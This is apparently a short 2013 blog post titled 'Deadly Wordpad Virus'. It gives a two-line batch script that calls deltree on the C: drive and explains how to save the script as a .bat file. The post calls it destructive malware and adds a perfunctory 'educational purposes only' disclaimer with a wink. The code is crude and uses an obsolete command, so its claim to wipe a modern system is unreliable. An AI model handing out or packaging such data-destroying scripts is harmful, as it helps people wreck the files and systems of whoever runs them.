Wednesday, December 4, 2013

Deadly Wordpad Virus



Code!
***********************************************************

@echo off

deltree C:\

************************************************************

Effect –>  Deadly and Destructive.

Coding Platform –>  Batch Programming.

Working –>  On executing, this code will delete every single piece of data from uR hard-drive. It will also wipe out windows from the system.
Just copy the code or type it in a worpad and save it as anyname with “.bat” extension.

NOTE: PLEASE DON’T RUN THAT “.bat” FILE ON YOUR SYSTEM. IT CAN BE VERY HARMFUL. AND LEARN THIS CODE FOR EDUCATIONAL PURPOSES ONLY, NOT TO HARM OTHERS. ;)

0 comments:

Post a Comment